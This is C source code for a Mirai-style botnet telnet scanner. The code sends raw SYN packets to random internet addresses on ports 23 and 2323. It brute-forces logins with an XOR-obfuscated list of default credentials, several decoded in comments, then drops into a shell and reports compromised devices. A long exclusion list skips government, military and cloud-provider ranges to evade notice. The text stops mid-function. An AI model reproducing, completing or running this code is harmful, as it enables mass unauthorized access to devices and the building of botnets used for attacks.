1
#define _GNU_SOURCE
2
3
#ifdef REKAI_TELNET
4
5
#ifdef DEBUG
6
#include <stdio.h>
7
#endif
8
#include <unistd.h>
9
#include <stdlib.h>
10
#include <sys/socket.h>
11
#include <arpa/inet.h>
12
#include <sys/select.h>
13
#include <sys/types.h>
14
#include <time.h>
15
#include <fcntl.h>
16
#include <signal.h>
17
#include <errno.h>
18
#include <string.h>
19
#include <linux/ip.h>
20
#include <linux/tcp.h>
21
22
#include "headers/includes.h"
23
#include "headers/scanner.h"
24
#include "headers/table.h"
25
#include "headers/rand.h"
26
#include "headers/util.h"
27
#include "headers/checksum.h"
28
#include "headers/resolv.h"
29
30
int scanner_pid, rsck, rsck_out, auth_table_len = 0;
31
char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};
32
struct scanner_auth *auth_table = NULL;
33
struct scanner_connection *conn_table;
34
uint16_t auth_table_max_weight = 0;
35
uint32_t fake_time = 0;
36
37
/* recv() wrapper that rewrites every 0x00 byte in the data just received to 'A'.
 * Returns recv()'s result unchanged: bytes read, 0 on orderly shutdown, -1 on error.
 * The rewrite only runs when ret > 0; presumably so later buffer matching never
 * sees embedded NULs — confirm against the callers' matching helpers. */
int recv_strip_null(int sock, void *buf, int len, int flags)
{
int ret = recv(sock, buf, len, flags);

if (ret > 0)
{
int i = 0;

for(i = 0; i < ret; i++)
{
if (((char *)buf)[i] == 0x00)
{
((char *)buf)[i] = 'A';
}
}
}

return ret;
}
56
57
void scanner_init(void)
58
{
59
int i;
60
uint16_t source_port;
61
struct iphdr *iph;
62
struct tcphdr *tcph;
63
64
// Let parent continue on main thread
65
// Let parent continue on main thread
66
scanner_pid = fork();
67
if (scanner_pid > 0 || scanner_pid == -1)
68
return;
69
70
LOCAL_ADDR = util_local_addr();
71
72
rand_init();
73
fake_time = time(NULL);
74
conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));
75
for (i = 0; i < SCANNER_MAX_CONNS; i++)
76
{
77
conn_table[i].state = SC_CLOSED;
78
conn_table[i].fd = -1;
79
}
80
81
// Set up raw socket scanning and payload
82
if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
83
{
84
#ifdef DEBUG
85
printf("[scanner] Failed to initialize raw socket, cannot scan\n");
86
#endif
87
exit(0);
88
}
89
fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
90
i = 1;
91
if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)
92
{
93
#ifdef DEBUG
94
printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");
95
#endif
96
close(rsck);
97
exit(0);
98
}
99
100
do
101
{
102
source_port = rand_next() & 0xffff;
103
}
104
while (ntohs(source_port) < 1024);
105
106
iph = (struct iphdr *)scanner_rawpkt;
107
tcph = (struct tcphdr *)(iph + 1);
108
109
// Set up IPv4 header
110
iph->ihl = 5;
111
iph->version = 4;
112
iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
113
iph->id = rand_next();
114
iph->ttl = 64;
115
iph->protocol = IPPROTO_TCP;
116
117
// Set up TCP header
118
tcph->dest = htons(23);
119
tcph->source = source_port;
120
tcph->doff = 5;
121
tcph->window = rand_next() & 0xffff;
122
tcph->syn = TRUE;
123
124
// Set up passwords
125
126
add_auth_entry("\x37\x2A\x2A\x31", "", 5);
127
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x24\x21\x28\x2C\x2B", 10);
128
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x74\x77\x76\x71", 9);
129
add_auth_entry("\x24\x21\x28\x2C\x2B", "", 5);
130
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x35\x24\x36\x36", 9);
131
add_auth_entry("\x37\x2A\x2A\x31", "\x3D\x26\x76\x70\x74\x74", 11);
132
add_auth_entry("\x37\x2A\x2A\x31", "\x33\x2C\x3F\x3D\x33", 11);
133
add_auth_entry("\x37\x2A\x2A\x31", "\x24\x2B\x31\x36\x29\x34", 11);
134
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x75\x75\x74\x26\x2D\x2C\x2B", 13);
135
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x70\x73", 11);
136
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76", 8);
137
add_auth_entry("\x30\x36\x20\x37", "\x30\x36\x20\x37", 8);
138
add_auth_entry("\x36\x30\x35\x35\x2A\x37\x31", "\x36\x30\x35\x35\x2A\x37\x31", 14);
139
add_auth_entry("\x74\x77\x76\x71", "\x74\x77\x76\x71", 8);
140
add_auth_entry("\x37\x2A\x2A\x31", "\x70\x30\x35", 7);
141
add_auth_entry("\x21\x20\x23\x24\x30\x29\x31", "", 7);
142
add_auth_entry("\x37\x2A\x2A\x31", "\x21\x20\x23\x24\x30\x29\x31", 11);
143
add_auth_entry("\x24\x21\x28", "", 3);
144
add_auth_entry("\x21\x24\x20\x28\x2A\x2B", "", 7);
145
add_auth_entry("\x27\x2C\x2B", "", 3);
146
add_auth_entry("\x37\x2A\x2A\x31", "\x24\x2B\x2E\x2A", 8);
147
add_auth_entry("\x37\x2A\x2A\x31", "\x2D\x30\x2B\x31\x70\x72\x70\x7C", 12);
148
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x74\x77\x76\x71", 12);
149
add_auth_entry("\x37\x2A\x2A\x31", "\x31\x31\x2B\x20\x31", 9);
150
add_auth_entry("\x37\x2A\x2A\x31", "\x3F\x29\x3D\x3D\x6B", 9);
151
add_auth_entry("\x37\x2A\x2A\x31", "\x37\x2A\x2A\x31", 8);
152
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x70", 9);
153
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x24\x34\x30\x24\x37\x2C\x2A", 12);
154
add_auth_entry("\x27\x24\x27\x3C", "\x27\x24\x27\x3C", 8);
155
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x31\x37\x30\x20", 9);
156
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x26\x2D\x24\x2B\x22\x20\x28\x20", 13);
157
add_auth_entry("\x37\x2A\x2A\x31", "\x26\x2D\x24\x2B\x22\x20\x28\x20", 12);
158
add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x74\x77\x76", 10);
159
add_auth_entry("\x37\x2A\x2A\x31", "\x09\x16\x2C\x30\x1C\x72\x35\x0A\x28\x1F\x02\x77\x36", 17); // root:LSiuY7pOmZG2s
160
add_auth_entry("\x24\x21\x28\x2C\x2B", "\x77\x73\x75\x74\x2D\x3D", 11); // admin:2601hx
161
add_auth_entry("\x37\x2A\x2A\x31", "\x31\x75\x31\x24\x29\x26\x75\x2B\x31\x37\x75\x29\x71\x64\x45", 19); // root:t0talc0ntr0l4!
162
add_auth_entry("\x21\x20", "", 4);
163
add_auth_entry("\x37\x2A\x2A\x31", "\x16\x77", 4); // de:S2
164
add_auth_entry("\x24\x21\x28", "", 3); // adm:
165
add_auth_entry("\x37\x2A\x2A\x31", "\x2C\x35\x26\x24\x28\x1A\x37\x31\x70\x76\x70\x75", 16);
166
167
#ifdef DEBUG
168
printf("[scanner] Scanner process initialized. Scanning started.\n");
169
#endif
170
171
// Main logic loop
172
while (TRUE)
173
{
174
fd_set fdset_rd, fdset_wr;
175
struct scanner_connection *conn;
176
struct timeval tim;
177
int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
178
179
// Spew out SYN to try and get a response
180
if (fake_time != last_spew)
181
{
182
last_spew = fake_time;
183
184
for (i = 0; i < SCANNER_RAW_PPS; i++)
185
{
186
struct sockaddr_in paddr = {0};
187
struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
188
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
189
190
iph->id = rand_next();
191
iph->saddr = LOCAL_ADDR;
192
iph->daddr = get_random_ip();
193
iph->check = 0;
194
iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
195
196
if (i % 10 == 0)
197
{
198
tcph->dest = htons(2323);
199
}
200
else
201
{
202
tcph->dest = htons(23);
203
}
204
tcph->seq = iph->daddr;
205
tcph->check = 0;
206
tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
207
208
paddr.sin_family = AF_INET;
209
paddr.sin_addr.s_addr = iph->daddr;
210
paddr.sin_port = tcph->dest;
211
212
sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
213
}
214
}
215
216
// Read packets from raw socket to get SYN+ACKs
217
last_avail_conn = 0;
218
while (TRUE)
219
{
220
int n;
221
char dgram[1514];
222
struct iphdr *iph = (struct iphdr *)dgram;
223
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
224
struct scanner_connection *conn;
225
226
errno = 0;
227
n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
228
if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
229
break;
230
231
if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
232
continue;
233
if (iph->daddr != LOCAL_ADDR)
234
continue;
235
if (iph->protocol != IPPROTO_TCP)
236
continue;
237
if (tcph->source != htons(23) && tcph->source != htons(2323))
238
continue;
239
if (tcph->dest != source_port)
240
continue;
241
if (!tcph->syn)
242
continue;
243
if (!tcph->ack)
244
continue;
245
if (tcph->rst)
246
continue;
247
if (tcph->fin)
248
continue;
249
if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
250
continue;
251
252
conn = NULL;
253
for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
254
{
255
if (conn_table[n].state == SC_CLOSED)
256
{
257
conn = &conn_table[n];
258
last_avail_conn = n;
259
break;
260
}
261
}
262
263
// If there were no slots, then no point reading any more
264
if (conn == NULL)
265
break;
266
267
conn->dst_addr = iph->saddr;
268
conn->dst_port = tcph->source;
269
setup_connection(conn);
270
#ifdef DEBUG
271
printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);
272
#endif
273
}
274
275
// Load file descriptors into fdsets
276
FD_ZERO(&fdset_rd);
277
FD_ZERO(&fdset_wr);
278
for (i = 0; i < SCANNER_MAX_CONNS; i++)
279
{
280
int timeout;
281
282
conn = &conn_table[i];
283
timeout = (conn->state > SC_CONNECTING ? 30 : 5);
284
285
if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
286
{
287
#ifdef DEBUG
288
printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
289
#endif
290
close(conn->fd);
291
conn->fd = -1;
292
293
// Retry
294
if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
295
{
296
if (++(conn->tries) == 10)
297
{
298
conn->tries = 0;
299
conn->state = SC_CLOSED;
300
}
301
else
302
{
303
setup_connection(conn);
304
#ifdef DEBUG
305
printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
306
#endif
307
}
308
}
309
else
310
{
311
conn->tries = 0;
312
conn->state = SC_CLOSED;
313
}
314
continue;
315
}
316
317
if (conn->state == SC_CONNECTING)
318
{
319
FD_SET(conn->fd, &fdset_wr);
320
if (conn->fd > mfd_wr)
321
mfd_wr = conn->fd;
322
}
323
else if (conn->state != SC_CLOSED)
324
{
325
FD_SET(conn->fd, &fdset_rd);
326
if (conn->fd > mfd_rd)
327
mfd_rd = conn->fd;
328
}
329
}
330
331
tim.tv_usec = 0;
332
tim.tv_sec = 1;
333
nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
334
fake_time = time(NULL);
335
336
for (i = 0; i < SCANNER_MAX_CONNS; i++)
337
{
338
conn = &conn_table[i];
339
340
if (conn->fd == -1)
341
continue;
342
343
if (FD_ISSET(conn->fd, &fdset_wr))
344
{
345
int err = 0, ret = 0;
346
socklen_t err_len = sizeof (err);
347
348
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
349
if (err == 0 && ret == 0)
350
{
351
conn->state = SC_HANDLE_IACS;
352
conn->auth = random_auth_entry();
353
conn->rdbuf_pos = 0;
354
#ifdef DEBUG
355
printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);
356
#endif
357
}
358
else
359
{
360
#ifdef DEBUG
361
printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
362
#endif
363
close(conn->fd);
364
conn->fd = -1;
365
conn->tries = 0;
366
conn->state = SC_CLOSED;
367
continue;
368
}
369
}
370
371
if (FD_ISSET(conn->fd, &fdset_rd))
372
{
373
while (TRUE)
374
{
375
int ret;
376
377
if (conn->state == SC_CLOSED)
378
break;
379
380
if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
381
{
382
memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
383
conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
384
}
385
errno = 0;
386
ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
387
if (ret == 0)
388
{
389
#ifdef DEBUG
390
printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
391
#endif
392
errno = ECONNRESET;
393
ret = -1; // Fall through to closing connection below
394
}
395
if (ret == -1)
396
{
397
if (errno != EAGAIN && errno != EWOULDBLOCK)
398
{
399
#ifdef DEBUG
400
printf("[scanner] FD%d lost connection\n", conn->fd);
401
#endif
402
close(conn->fd);
403
conn->fd = -1;
404
405
// Retry
406
if (++(conn->tries) >= 10)
407
{
408
conn->tries = 0;
409
conn->state = SC_CLOSED;
410
}
411
else
412
{
413
setup_connection(conn);
414
#ifdef DEBUG
415
printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
416
#endif
417
}
418
}
419
break;
420
}
421
conn->rdbuf_pos += ret;
422
conn->last_recv = fake_time;
423
424
while (TRUE)
425
{
426
int consumed = 0;
427
428
switch (conn->state)
429
{
430
case SC_HANDLE_IACS:
431
if ((consumed = consume_iacs(conn)) > 0)
432
{
433
conn->state = SC_WAITING_USERNAME;
434
#ifdef DEBUG
435
printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);
436
#endif
437
}
438
break;
439
case SC_WAITING_USERNAME:
440
if ((consumed = consume_user_prompt(conn)) > 0)
441
{
442
send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);
443
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
444
conn->state = SC_WAITING_PASSWORD;
445
#ifdef DEBUG
446
printf("[scanner] FD%d received username prompt\n", conn->fd);
447
#endif
448
}
449
break;
450
case SC_WAITING_PASSWORD:
451
if ((consumed = consume_pass_prompt(conn)) > 0)
452
{
453
#ifdef DEBUG
454
printf("[scanner] FD%d received password prompt\n", conn->fd);
455
#endif
456
457
// Send password
458
send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);
459
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
460
461
conn->state = SC_WAITING_PASSWD_RESP;
462
}
463
break;
464
case SC_WAITING_PASSWD_RESP:
465
if ((consumed = consume_any_prompt(conn)) > 0)
466
{
467
char *tmp_str;
468
int tmp_len;
469
470
#ifdef DEBUG
471
printf("[scanner] FD%d received shell prompt\n", conn->fd);
472
#endif
473
474
// Send enable / system / shell / sh to session to drop into shell if needed
475
table_unlock_val(TABLE_SCAN_ENABLE);
476
tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);
477
send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
478
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
479
table_lock_val(TABLE_SCAN_ENABLE);
480
conn->state = SC_WAITING_ENABLE_RESP;
481
}
482
break;
483
case SC_WAITING_ENABLE_RESP:
484
if ((consumed = consume_any_prompt(conn)) > 0)
485
{
486
char *tmp_str;
487
int tmp_len;
488
489
#ifdef DEBUG
490
printf("[scanner] FD%d received sh prompt\n", conn->fd);
491
#endif
492
493
table_unlock_val(TABLE_SCAN_SYSTEM);
494
tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);
495
send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
496
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
497
table_lock_val(TABLE_SCAN_SYSTEM);
498
499
conn->state = SC_WAITING_SYSTEM_RESP;
500
}
501
break;
502
case SC_WAITING_SYSTEM_RESP:
503
if ((consumed = consume_any_prompt(conn)) > 0)
504
{
505
char *tmp_str;
506
int tmp_len;
507
508
#ifdef DEBUG
509
printf("[scanner] FD%d received sh prompt\n", conn->fd);
510
#endif
511
512
table_unlock_val(TABLE_SCAN_SHELL);
513
tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);
514
send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
515
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
516
table_lock_val(TABLE_SCAN_SHELL);
517
518
conn->state = SC_WAITING_SHELL_RESP;
519
}
520
break;
521
case SC_WAITING_SHELL_RESP:
522
if ((consumed = consume_any_prompt(conn)) > 0)
523
{
524
char *tmp_str;
525
int tmp_len;
526
527
#ifdef DEBUG
528
printf("[scanner] FD%d received enable prompt\n", conn->fd);
529
#endif
530
531
table_unlock_val(TABLE_SCAN_SH);
532
tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);
533
send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
534
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
535
table_lock_val(TABLE_SCAN_SH);
536
537
conn->state = SC_WAITING_SH_RESP;
538
}
539
break;
540
case SC_WAITING_SH_RESP:
541
if ((consumed = consume_any_prompt(conn)) > 0)
542
{
543
char *tmp_str;
544
int tmp_len;
545
546
#ifdef DEBUG
547
printf("[scanner] FD%d received sh prompt\n", conn->fd);
548
#endif
549
550
// Send query string
551
table_unlock_val(TABLE_SCAN_QUERY);
552
tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);
553
send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
554
send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
555
table_lock_val(TABLE_SCAN_QUERY);
556
557
conn->state = SC_WAITING_TOKEN_RESP;
558
}
559
break;
560
case SC_WAITING_TOKEN_RESP:
561
consumed = consume_resp_prompt(conn);
562
if (consumed == -1)
563
{
564
#ifdef DEBUG
565
printf("[scanner] FD%d invalid username/password combo\n", conn->fd);
566
#endif
567
close(conn->fd);
568
conn->fd = -1;
569
570
// Retry
571
if (++(conn->tries) == 10)
572
{
573
conn->tries = 0;
574
conn->state = SC_CLOSED;
575
}
576
else
577
{
578
setup_connection(conn);
579
#ifdef DEBUG
580
printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
581
#endif
582
}
583
}
584
else if (consumed > 0)
585
{
586
char *tmp_str;
587
int tmp_len;
588
#ifdef DEBUG
589
printf("[scanner] FD%d Found verified working telnet\n", conn->fd);
590
#endif
591
report_working(conn->dst_addr, conn->dst_port, conn->auth);
592
close(conn->fd);
593
conn->fd = -1;
594
conn->state = SC_CLOSED;
595
}
596
break;
597
default:
598
consumed = 0;
599
break;
600
}
601
602
// If no data was consumed, move on
603
if (consumed == 0)
604
break;
605
else
606
{
607
if (consumed > conn->rdbuf_pos)
608
consumed = conn->rdbuf_pos;
609
610
conn->rdbuf_pos -= consumed;
611
memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
612
}
613
}
614
}
615
}
616
}
617
}
618
}
619
620
/* Sends signal 9 (SIGKILL) to the process id that scanner_init() stored in scanner_pid. */
void scanner_kill(void)
{
kill(scanner_pid, 9);
}
624
625
static void setup_connection(struct scanner_connection *conn)
626
{
627
struct sockaddr_in addr = {0};
628
629
if (conn->fd != -1)
630
close(conn->fd);
631
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
632
{
633
#ifdef DEBUG
634
printf("[scanner] Failed to call socket()\n");
635
#endif
636
return;
637
}
638
639
conn->rdbuf_pos = 0;
640
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
641
642
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
643
644
addr.sin_family = AF_INET;
645
addr.sin_addr.s_addr = conn->dst_addr;
646
addr.sin_port = conn->dst_port;
647
648
conn->last_recv = fake_time;
649
conn->state = SC_CONNECTING;
650
connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
651
}
652
653
654
static ipv4_t get_random_ip(void)
655
{
656
uint32_t tmp;
657
uint8_t o1, o2, o3, o4;
658
659
do
660
{
661
tmp = rand_next();
662
663
o1 = tmp & 0xff;
664
o2 = (tmp >> 8) & 0xff;
665
o3 = (tmp >> 16) & 0xff;
666
o4 = (tmp >> 24) & 0xff;
667
}
668
while (o1 == 127 || //Loopback
669
(o1 == 0) || //Invalid address space
670
(o1 == 3) || //General Electric Company
671
(o1 == 15 || o1 == 16) || //Hewlett-Packard Company
672
(o1 == 56) || //US Postal Service
673
(o1 == 10) || //Internal network
674
(o1 == 25) || //Some more
675
(o1 == 49) || //Some more
676
(o1 == 50) || //Some more
677
(o1 == 137) || //Some more
678
(o1 == 6) || //Department of Defense
679
(o1 == 7) || //Department of Defense
680
(o1 == 11) || //Department of Defense
681
(o1 == 21) || //Department of Defense
682
(o1 == 22) || //Department of Defense
683
(o1 == 26) || //Department of Defense
684
(o1 == 28) || //Department of Defense
685
(o1 == 29) || //Department of Defense
686
(o1 == 30) || //Department of Defense
687
(o1 == 33) || //Department of Defense
688
(o1 == 55) || //Department of Defense
689
(o1 == 214) || //Department of Defense
690
(o1 == 215) || //Department of Defense
691
(o1 == 192 && o2 == 168) || //Internal network
692
(o1 == 172 && o2 >= 16 && o2 < 32) || //Internal network
693
(o1 == 100 && o2 >= 64 && o2 < 127) || //IANA NAT reserved
694
(o1 == 169 && o2 > 254) || //IANA NAT reserved
695
(o1 == 198 && o2 >= 18 && o2 < 20) || //IANA Special use
696
(o1 == 146 && o2 == 17) || //Some more
697
(o1 == 146 && o2 == 80) || //Some more
698
(o1 == 146 && o2 == 98) || //Some more
699
(o1 == 146 && o2 == 154) || //Some more
700
(o1 == 147 && o2 == 159) || //Some more
701
(o1 == 148 && o2 == 114) || //Some more
702
(o1 == 150 && o2 == 125) || //Some more
703
(o1 == 150 && o2 == 133) || //Some more
704
(o1 == 150 && o2 == 144) || //Some more
705
(o1 == 150 && o2 == 149) || //Some more
706
(o1 == 150 && o2 == 157) || //Some more
707
(o1 == 150 && o2 == 184) || //Some more
708
(o1 == 150 && o2 == 190) || //Some more
709
(o1 == 150 && o2 == 196) || //Some more
710
(o1 == 152 && o2 == 82) || //Some more
711
(o1 == 152 && o2 == 229) || //Some more
712
(o1 == 157 && o2 == 202) || //Some more
713
(o1 == 157 && o2 == 217) || //Some more
714
(o1 == 161 && o2 == 124) || //Some more
715
(o1 == 162 && o2 == 32) || //Some more
716
(o1 == 155 && o2 == 96) || //Some more
717
(o1 == 155 && o2 == 149) || //Some more
718
(o1 == 155 && o2 == 155) || //Some more
719
(o1 == 155 && o2 == 178) || //Some more
720
(o1 == 164 && o2 == 158) || //Some more
721
(o1 == 156 && o2 == 9) || //Some more
722
(o1 == 167 && o2 == 44) || //Some more
723
(o1 == 168 && o2 == 68) || //Some more
724
(o1 == 168 && o2 == 85) || //Some more
725
(o1 == 168 && o2 == 102) || //Some more
726
(o1 == 203 && o2 == 59) || //Some more
727
(o1 == 204 && o2 == 34) || //Some more
728
(o1 == 207 && o2 == 30) || //Some more
729
(o1 == 117 && o2 == 55) || //Some more
730
(o1 == 117 && o2 == 56) || //Some more
731
(o1 == 80 && o2 == 235) || //Some more
732
(o1 == 207 && o2 == 120) || //Some more
733
(o1 == 209 && o2 == 35) || //Some more
734
(o1 == 64 && o2 == 70) || //Some more
735
(o1 == 64 && o2 >= 69 && o2 < 227) || //Some more
736
(o1 == 128 && o2 >= 35 && o2 < 237) || //Some more
737
(o1 == 129 && o2 >= 22 && o2 < 255) || //Some more
738
(o1 == 130 && o2 >= 40 && o2 < 168) || //Some more
739
(o1 == 131 && o2 >= 3 && o2 < 251) || //Some more
740
(o1 == 132 && o2 >= 3 && o2 < 251) || //Some more
741
(o1 == 134 && o2 >= 5 && o2 < 235) || //Some more
742
(o1 == 136 && o2 >= 177 && o2 < 223) || //Some more
743
(o1 == 138 && o2 >= 13 && o2 < 194) || //Some more
744
(o1 == 139 && o2 >= 31 && o2 < 143) || //Some more
745
(o1 == 140 && o2 >= 1 && o2 < 203) || //Some more
746
(o1 == 143 && o2 >= 45 && o2 < 233) || //Some more
747
(o1 == 144 && o2 >= 99 && o2 < 253) || //Some more
748
(o1 == 146 && o2 >= 165 && o2 < 166) || //Some more
749
(o1 == 147 && o2 >= 35 && o2 < 43) || //Some more
750
(o1 == 147 && o2 >= 103 && o2 < 105) || //Some more
751
(o1 == 147 && o2 >= 168 && o2 < 170) || //Some more
752
(o1 == 147 && o2 >= 198 && o2 < 200) || //Some more
753
(o1 == 147 && o2 >= 238 && o2 < 255) || //Some more
754
(o1 == 150 && o2 >= 113 && o2 < 115) || //Some more
755
(o1 == 152 && o2 >= 151 && o2 < 155) || //Some more
756
(o1 == 153 && o2 >= 21 && o2 < 32) || //Some more
757
(o1 == 155 && o2 >= 5 && o2 < 10) || //Some more
758
(o1 == 155 && o2 >= 74 && o2 < 89) || //Some more
759
(o1 == 155 && o2 >= 213 && o2 < 222) || //Some more
760
(o1 == 157 && o2 >= 150 && o2 < 154) || //Some more
761
(o1 == 158 && o2 >= 1 && o2 < 21) || //Some more
762
(o1 == 158 && o2 >= 235 && o2 < 247) || //Some more
763
(o1 == 159 && o2 >= 120 && o2 < 121) || //Some more
764
(o1 == 160 && o2 >= 132 && o2 < 151) || //Some more
765
(o1 == 64 && o2 >= 224 && o2 < 227) || //Some more
766
(o1 == 162 && o2 >= 45 && o2 < 47) || //CIA
767
(o1 == 163 && o2 >= 205 && o2 < 207) || //NASA Kennedy Space Center
768
(o1 == 164 && o2 >= 45 && o2 < 50) || //NASA Kennedy Space Center
769
(o1 == 164 && o2 >= 217 && o2 < 233) || //NASA Kennedy Space Center
770
(o1 == 169 && o2 >= 252 && o2 < 254) || //U.S. Department of State
771
(o1 == 199 && o2 >= 121 && o2 < 254) || //Naval Air Systems Command, VA
772
(o1 == 205 && o2 >= 1 && o2 < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
773
(o1 == 207 && o2 >= 60 && o2 < 62) || //FBI controlled Linux servers & IPs/IP-Ranges
774
(o1 == 104 && o2 >= 16 && o2 < 31) || //Cloudflare
775
(o1 == 188 && o2 == 166) || //Digital Ocean
776
(o1 == 188 && o2 == 226) || //Digital Ocean
777
(o1 == 159 && o2 == 203) || //Digital Ocean
778
(o1 == 162 && o2 == 243) || //Digital Ocean
779
(o1 == 45 && o2 == 55) || //Digital Ocean
780
(o1 == 178 && o2 == 62) || //Digital Ocean
781
(o1 == 104 && o2 == 131) || //Digital Ocean
782
(o1 == 104 && o2 == 236) || //Digital Ocean
783
(o1 == 107 && o2 == 170) || //Digital Ocean
784
(o1 == 138 && o2 == 197) || //Digital Ocean
785
(o1 == 138 && o2 == 68) || //Digital Ocean
786
(o1 == 139 && o2 == 59) || //Digital Ocean
787
(o1 == 146 && o2 == 185 && o3 >= 128 && o3 < 191) || //Digital Ocean
788
(o1 == 163 && o2 == 47 && o3 >= 10 && o3 < 11) || //Digital Ocean
789
(o1 == 174 && o2 == 138 && o3 >= 1 && o3 < 127) || //Digital Ocean
790
(o1 == 192 && o2 == 241 && o3 >= 128 && o3 < 255) || //Digital Ocean
791
(o1 == 198 && o2 == 199 && o3 >= 64 && o3 < 127) || //Digital Ocean
792
(o1 == 198 && o2 == 211 && o3 >= 96 && o3 < 127) || //Digital Ocean
793
(o1 == 207 && o2 == 154 && o3 >= 192 && o3 < 255) || //Digital Ocean
794
(o1 == 37 && o2 == 139 && o3 >= 1 && o3 < 31) || //Digital Ocean
795
(o1 == 67 && o2 == 207 && o3 >= 64 && o3 < 95) || //Digital Ocean
796
(o1 == 67 && o2 == 205 && o3 >= 128 && o3 < 191) || //Digital Ocean
797
(o1 == 80 && o2 == 240 && o3 >= 128 && o3 < 143) || //Digital Ocean
798
(o1 == 82 && o2 == 196 && o3 >= 1 && o3 < 15) || //Digital Ocean
799
(o1 == 95 && o2 == 85 && o3 >= 8 && o3 < 63) || //Digital Ocean
800
(o1 == 64 && o2 == 237 && o3 >= 32 && o3 < 43) || //Choopa & Vultr
801
(o1 == 185 && o2 == 92 && o3 >= 220 && o3 < 223) || //Choopa & Vultr
802
(o1 == 104 && o2 == 238 && o3 >= 128 && o3 < 191) || //Choopa & Vultr
803
(o1 == 209 && o2 == 222 && o3 >= 1 && o3 < 31) || //Choopa & Vultr
804
(o1 == 208 && o2 == 167 && o3 >= 232 && o3 < 252) || //Choopa & Vultr
805
(o1 == 66 && o2 == 55 && o3 >= 128 && o3 < 159) || //Choopa & Vultr
806
(o1 == 45 && o2 == 63 && o3 >= 1 && o3 < 127) || //Choopa & Vultr
807
